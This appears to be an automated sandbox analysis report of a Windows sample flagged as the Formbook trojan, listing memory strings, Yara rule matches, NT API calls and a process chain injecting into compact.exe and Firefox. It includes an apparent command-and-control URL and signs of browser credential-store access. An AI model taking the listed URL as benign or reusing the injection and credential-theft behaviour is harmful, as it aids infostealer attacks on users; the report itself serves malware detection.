          Source: compact.exe, 00000005.00000002.3605554811.0000000004E84000.00000004.10000000.00040000.00000000.sdmp, XFLTednCZUTqje.exe, 00000006.00000002.3604847217.0000000004144000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://yourtech-agency.com/99um/?f6SpQ=_n84nZ4HGta&Sh=sejrBqbnhxLzIpZobXocfoJh7
          Source: compact.exe, 00000005.00000003.2159904469.000000000330C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: compact.exe, 00000005.00000003.2159904469.000000000330C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: compact.exe, 00000005.00000002.3605554811.00000000049CE000.00000004.10000000.00040000.00000000.sdmp, XFLTednCZUTqje.exe, 00000006.00000002.3604847217.0000000003C8E000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/gsap/3.1.1/gsap.min.js
          Source: compact.exe, 00000005.00000002.3605554811.00000000049CE000.00000004.10000000.00040000.00000000.sdmp, XFLTednCZUTqje.exe, 00000006.00000002.3604847217.0000000003C8E000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
          Source: compact.exe, 00000005.00000002.3605554811.00000000049CE000.00000004.10000000.00040000.00000000.sdmp, XFLTednCZUTqje.exe, 00000006.00000002.3604847217.0000000003C8E000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css
          Source: compact.exe, 00000005.00000003.2159904469.000000000330C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: compact.exe, 00000005.00000003.2159904469.000000000330C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: compact.exe, 00000005.00000003.2159904469.000000000330C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: compact.exe, 00000005.00000003.2159904469.000000000330C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: compact.exe, 00000005.00000003.2159904469.000000000330C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: compact.exe, 00000005.00000002.3603499562.0000000003274000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
          Source: compact.exe, 00000005.00000002.3603499562.0000000003274000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
          Source: compact.exe, 00000005.00000002.3603499562.0000000003274000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
          Source: compact.exe, 00000005.00000002.3603499562.0000000003274000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
          Source: compact.exe, 00000005.00000002.3603499562.0000000003274000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
          Source: compact.exe, 00000005.00000003.2149956057.0000000008024000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
          Source: compact.exe, 00000005.00000003.2159904469.000000000330C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
          Source: compact.exe, 00000005.00000003.2159904469.000000000330C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

          E-Banking Fraud

          Source: Yara match File source: 0.2.NjjLYnPSZr.exe.df0000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 00000005.00000002.3604353824.00000000035A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000006.00000002.3606411027.0000000005500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000002.3604571155.0000000003490000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000000.00000002.1971161309.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
          Source: Yara match File source: 00000005.00000002.3604458798.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000000.00000002.1971118603.0000000000D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000000.00000002.1971533263.0000000001E70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000005.00000002.3603288385.00000000030E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          Source: 0.2.NjjLYnPSZr.exe.df0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.3604353824.00000000035A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000006.00000002.3606411027.0000000005500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.3604571155.0000000003490000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.1971161309.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.3604458798.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.1971118603.0000000000D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.1971533263.0000000001E70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.3603288385.00000000030E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exe Code function: 0_2_00E1C4A3 NtClose,0_2_00E1C4A3
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exe Code function: 0_2_01062B60 NtClose,LdrInitializeThunk,0_2_01062B60
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exe Code function: 0_2_01062DF0 NtQuerySystemInformation,LdrInitializeThunk,0_2_01062DF0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exe Code function: 0_2_01062C70 NtFreeVirtualMemory,LdrInitializeThunk,0_2_01062C70
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exe Code function: 0_2_010635C0 NtCreateMutant,LdrInitializeThunk,0_2_010635C0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exe Code function: 0_2_01064340 NtSetContextThread,0_2_01064340
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exe Code function: 0_2_01064650 NtSuspendThread,0_2_01064650
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exe Code function: 0_2_01062B80 NtQueryInformationFile,0_2_01062B80
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exe Code function: 0_2_01062BA0 NtEnumerateValueKey,0_2_01062BA0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exe Code function: 0_2_01062BE0 NtQueryValueKey,0_2_01062BE0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exe Code function: 0_2_01062BF0 NtAllocateVirtualMemory,0_2_01062BF0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exe Code function: 0_2_01062AB0 NtWaitForSingleObject,0_2_01062AB0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exe Code function: 0_2_01062AD0 NtReadFile,0_2_01062AD0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exe Code function: 0_2_01062AF0 NtWriteFile,0_2_01062AF0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exe Code function: 0_2_01062D00 NtSetInformationFile,0_2_01062D00
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exe Code function: 0_2_01062D10 NtMapViewOfSection,0_2_01062D10
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exe Code function: 0_2_01062D30 NtUnmapViewOfSection,0_2_01062D30
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exe Code function: 0_2_01062DB0 NtEnumerateKey,0_2_01062DB0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exe Code function: 0_2_01062DD0 NtDelayExecution,0_2_01062DD0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exe Code function: 0_2_01062C00 NtQueryInformationProcess,0_2_01062C00
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exe Code function: 0_2_01062C60 NtCreateKey,0_2_01062C60
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exe Code function: 0_2_01062CA0 NtQueryInformationToken,0_2_01062CA0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exe Code function: 0_2_01062CC0 NtQueryVirtualMemory,0_2_01062CC0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exe Code function: 0_2_01062CF0 NtOpenProcess,0_2_01062CF0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exe Code function: 0_2_01062F30 NtCreateSection,0_2_01062F30
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exe Code function: 0_2_01062F60 NtCreateProcessEx,0_2_01062F60
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exe Code function: 0_2_01062F90 NtProtectVirtualMemory,0_2_01062F90
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exe Code function: 0_2_01062FA0 NtQuerySection,0_2_01062FA0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exe Code function: 0_2_01062FB0 NtResumeThread,0_2_01062FB0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exe Code function: 0_2_01062FE0 NtCreateFile,0_2_01062FE0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exe Code function: 0_2_01062E30 NtWriteVirtualMemory,0_2_01062E30
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exe Code function: 0_2_01062E80 NtReadVirtualMemory,0_2_01062E80
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exe Code function: 0_2_01062EA0 NtAdjustPrivilegesToken,0_2_01062EA0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exe Code function: 0_2_01062EE0 NtQueueApcThread,0_2_01062EE0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exe Code function: 0_2_01063010 NtOpenDirectoryObject,0_2_01063010
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exe Code function: 0_2_01063090 NtSetValueKey,0_2_01063090
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exe Code function: 0_2_010639B0 NtGetContextThread,0_2_010639B0
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exe Code function: 0_2_01063D10 NtOpenProcessToken,0_2_01063D10
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exe Code function: 0_2_01063D70 NtOpenThread,0_2_01063D70
          Source: C:\Windows\SysWOW64\compact.exe Code function: 5_2_03854340 NtSetContextThread,LdrInitializeThunk,5_2_03854340
          Source: C:\Windows\SysWOW64\compact.exe Code function: 5_2_03854650 NtSuspendThread,LdrInitializeThunk,5_2_03854650
          Source: C:\Windows\SysWOW64\compact.exe Code function: 5_2_03852BA0 NtEnumerateValueKey,LdrInitializeThunk,5_2_03852BA0
          Source: C:\Windows\SysWOW64\compact.exe Code function: 5_2_03852BE0 NtQueryValueKey,LdrInitializeThunk,5_2_03852BE0
          Source: C:\Windows\SysWOW64\compact.exe Code function: 5_2_03852BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_03852BF0
          Source: C:\Windows\SysWOW64\compact.exe Code function: 5_2_03852B60 NtClose,LdrInitializeThunk,5_2_03852B60
          Source: C:\Windows\SysWOW64\compact.exe Code function: 5_2_03852AD0 NtReadFile,LdrInitializeThunk,5_2_03852AD0
          Source: C:\Windows\SysWOW64\compact.exe Code function: 5_2_03852AF0 NtWriteFile,LdrInitializeThunk,5_2_03852AF0
          Source: C:\Windows\SysWOW64\compact.exe Code function: 5_2_03852FB0 NtResumeThread,LdrInitializeThunk,5_2_03852FB0
          Source: C:\Windows\SysWOW64\compact.exe Code function: 5_2_03852FE0 NtCreateFile,LdrInitializeThunk,5_2_03852FE0
          Source: C:\Windows\SysWOW64\compact.exe Code function: 5_2_03852F30 NtCreateSection,LdrInitializeThunk,5_2_03852F30
          Source: C:\Windows\SysWOW64\compact.exe Code function: 5_2_03852E80 NtReadVirtualMemory,LdrInitializeThunk,5_2_03852E80
          Source: C:\Windows\SysWOW64\compact.exe Code function: 5_2_03852EE0 NtQueueApcThread,LdrInitializeThunk,5_2_03852EE0
          Source: C:\Windows\SysWOW64\compact.exe Code function: 5_2_03852DD0 NtDelayExecution,LdrInitializeThunk,5_2_03852DD0
          Source: C:\Windows\SysWOW64\compact.exe Code function: 5_2_03852DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_03852DF0
          Source: C:\Windows\SysWOW64\compact.exe Code function: 5_2_03852D10 NtMapViewOfSection,LdrInitializeThunk,5_2_03852D10
          Source: C:\Windows\SysWOW64\compact.exe Code function: 5_2_03852D30 NtUnmapViewOfSection,LdrInitializeThunk,5_2_03852D30
          Source: C:\Windows\SysWOW64\compact.exe Code function: 5_2_03852CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_03852CA0
          Source: C:\Windows\SysWOW64\compact.exe Code function: 5_2_03852C60 NtCreateKey,LdrInitializeThunk,5_2_03852C60
          Source: C:\Windows\SysWOW64\compact.exe Code function: 5_2_03852C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_03852C70
          Source: C:\Windows\SysWOW64\compact.exe Code function: 5_2_038535C0 NtCreateMutant,LdrInitializeThunk,5_2_038535C0
          Source: C:\Windows\SysWOW64\compact.exe Code function: 5_2_038539B0 NtGetContextThread,LdrInitializeThunk,5_2_038539B0
          Source: C:\Windows\SysWOW64\compact.exe Code function: 5_2_03852B80 NtQueryInformationFile,5_2_03852B80
          Source: C:\Windows\SysWOW64\compact.exe Code function: 5_2_03852AB0 NtWaitForSingleObject,5_2_03852AB0
          Source: C:\Windows\SysWOW64\compact.exe Code function: 5_2_03852F90 NtProtectVirtualMemory,5_2_03852F90
          Source: C:\Windows\SysWOW64\compact.exe Code function: 5_2_03852FA0 NtQuerySection,5_2_03852FA0
          Source: C:\Windows\SysWOW64\compact.exe Code function: 5_2_03852F60 NtCreateProcessEx,5_2_03852F60
          Source: C:\Windows\SysWOW64\compact.exe Code function: 5_2_03852EA0 NtAdjustPrivilegesToken,5_2_03852EA0
          Source: C:\Windows\SysWOW64\compact.exe Code function: 5_2_03852E30 NtWriteVirtualMemory,5_2_03852E30
          Source: C:\Windows\SysWOW64\compact.exe Code function: 5_2_03852DB0 NtEnumerateKey,5_2_03852DB0
          Source: C:\Windows\SysWOW64\compact.exe Code function: 5_2_03852D00 NtSetInformationFile,5_2_03852D00
          Source: C:\Windows\SysWOW64\compact.exe Code function: 5_2_03852CC0 NtQueryVirtualMemory,5_2_03852CC0
          Source: C:\Windows\SysWOW64\compact.exe Code function: 5_2_03852CF0 NtOpenProcess,5_2_03852CF0
          Source: C:\Windows\SysWOW64\compact.exe Code function: 5_2_03852C00 NtQueryInformationProcess,5_2_03852C00
          Source: C:\Windows\SysWOW64\compact.exe Code function: 5_2_03853090 NtSetValueKey,5_2_03853090
          Source: C:\Windows\SysWOW64\compact.exe Code function: 5_2_03853010 NtOpenDirectoryObject,5_2_03853010
          Source: C:\Windows\SysWOW64\compact.exe Code function: 5_2_03853D10 NtOpenProcessToken,5_2_03853D10
          Source: C:\Windows\SysWOW64\compact.exe Code function: 5_2_03853D70 NtOpenThread,5_2_03853D70
          Source: C:\Windows\SysWOW64\compact.exe Code function: 5_2_03108F40 NtReadFile,5_2_03108F40
          Source: C:\Windows\SysWOW64\compact.exe Code function: 5_2_03108DD0 NtCreateFile,5_2_03108DD0
          Source: C:\Windows\SysWOW64\compact.exe Code function: 5_2_03109230 NtAllocateVirtualMemory,5_2_03109230
          Source: C:\Windows\SysWOW64\compact.exe Code function: 5_2_03109030 NtDeleteFile,5_2_03109030
          Source: C:\Windows\SysWOW64\compact.exe Code function: 5_2_031090D0 NtClose,5_2_031090D0
          Source: C:\Windows\SysWOW64\compact.exe Code function: 5_2_036FF901 NtClose,5_2_036FF901
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_03895BF05_2_03895BF0
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_0385DBF95_2_0385DBF9
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038DFB765_2_038DFB76
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_03865AA05_2_03865AA0
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038BDAAC5_2_038BDAAC
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038C1AA35_2_038C1AA3
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038CDAC65_2_038CDAC6
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038DFA495_2_038DFA49
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038D7A465_2_038D7A46
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_03893A6C5_2_03893A6C
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038B59105_2_038B5910
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038299505_2_03829950
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_0383B9505_2_0383B950
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038238E05_2_038238E0
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_0388D8005_2_0388D800
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_03821F925_2_03821F92
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038DFFB15_2_038DFFB1
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038DFF095_2_038DFF09
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_03829EB05_2_03829EB0
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_0383FDC05_2_0383FDC0
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_03823D405_2_03823D40
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038D1D5A5_2_038D1D5A
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038D7D735_2_038D7D73
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_038DFCF25_2_038DFCF2
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_03899C325_2_03899C32
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_030F1A305_2_030F1A30
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_030ECB505_2_030ECB50
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_030EABC85_2_030EABC8
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_030EABD05_2_030EABD0
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_030EC92B5_2_030EC92B
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_030EC9305_2_030EC930
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_030F329B5_2_030F329B
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_030F32A05_2_030F32A0
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_030F50C05_2_030F50C0
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_0310B6B05_2_0310B6B0
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_036FE3855_2_036FE385
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_036FE1DC5_2_036FE1DC
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_036FE7235_2_036FE723
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_036FD7885_2_036FD788
          Source: C:\Windows\SysWOW64\compact.exeCode function: 5_2_036FCA335_2_036FCA33
          Source: C:\Windows\SysWOW64\compact.exe Code function: String function: 0388EA12 appears 86 times
          Source: C:\Windows\SysWOW64\compact.exe Code function: String function: 0380B970 appears 262 times
          Source: C:\Windows\SysWOW64\compact.exe Code function: String function: 03867E54 appears 107 times
          Source: C:\Windows\SysWOW64\compact.exe Code function: String function: 03855130 appears 58 times
          Source: C:\Windows\SysWOW64\compact.exe Code function: String function: 0389F290 appears 103 times
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exe Code function: String function: 01065130 appears 58 times
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exe Code function: String function: 01077E54 appears 99 times
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exe Code function: String function: 0101B970 appears 262 times
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exe Code function: String function: 0109EA12 appears 86 times
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exe Code function: String function: 010AF290 appears 103 times
          Source: NjjLYnPSZr.exe Static PE information: No import functions for PE file found
          Source: NjjLYnPSZr.exe, 00000000.00000003.1881085129.0000000000F6D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs NjjLYnPSZr.exe
          Source: NjjLYnPSZr.exe, 00000000.00000002.1971204229.00000000012C1000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs NjjLYnPSZr.exe
          Source: NjjLYnPSZr.exe, 00000000.00000003.1970894978.0000000000934000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCOMPACT.EXEj% vs NjjLYnPSZr.exe
          Source: NjjLYnPSZr.exe, 00000000.00000003.1879483342.0000000000BFA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs NjjLYnPSZr.exe
          Source: NjjLYnPSZr.exe, 00000000.00000003.1970894978.000000000091D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCOMPACT.EXEj% vs NjjLYnPSZr.exe
          Source: NjjLYnPSZr.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 0.2.NjjLYnPSZr.exe.df0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.3604353824.00000000035A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000006.00000002.3606411027.0000000005500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.3604571155.0000000003490000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.1971161309.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.3604458798.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.1971118603.0000000000D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.1971533263.0000000001E70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.3603288385.00000000030E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: NjjLYnPSZr.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: NjjLYnPSZr.exe Static PE information: Section .text
          Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@5/1@13/9
          Source: C:\Windows\SysWOW64\compact.exe File created: C:\Users\user\AppData\Local\Temp\s1951-LPl
          Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
          Source: C:\Users\user\Desktop\NjjLYnPSZr.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: compact.exe, 00000005.00000002.3603499562.00000000032D9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: NjjLYnPSZr.exe ReversingLabs: Detection: 60%
          Source: unknown Process created: C:\Users\user\Desktop\NjjLYnPSZr.exe "C:\Users\user\Desktop\NjjLYnPSZr.exe"
          Source: C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe Process created: C:\Windows\SysWOW64\compact.exe "C:\Windows\SysWOW64\compact.exe"
          Source: C:\Windows\SysWOW64\compact.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
